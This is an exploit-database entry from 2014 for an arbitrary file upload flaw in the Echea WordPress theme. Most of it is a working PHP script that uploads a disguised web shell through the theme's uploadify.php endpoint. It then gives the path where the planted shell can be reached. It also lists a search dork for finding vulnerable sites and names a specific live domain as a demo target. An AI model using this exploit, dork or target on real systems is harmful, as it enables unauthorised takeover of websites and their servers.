id: 22253
date: 05/15/2014
title: Wordpress Theme Echea Shell Upload Vulnerability
author: Aloulou
cves: 

############################################################################

# Title : Wordpress Theme Echea Shell Upload Vulnerability    

# Author : Aloulou                                              

# Date : 15/05/2014                                                     

# Facebook : http://www.facebook.com/Aloulou.TN                                

# Email: aloulou@alquds.com

# Vendor : www.themeforest.net                                                      

# Google Dork : inurl:/wp-content/themes/echea/

# Tested on : Linux 
                       


############################################################################



Exploit: 

<?php
$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


ShellAccess:

    http://127.0.0.1/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg

Demo:http://yanaselandscaping.com

# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy 


############################################################################

#  0day.today [2023-03-21]  #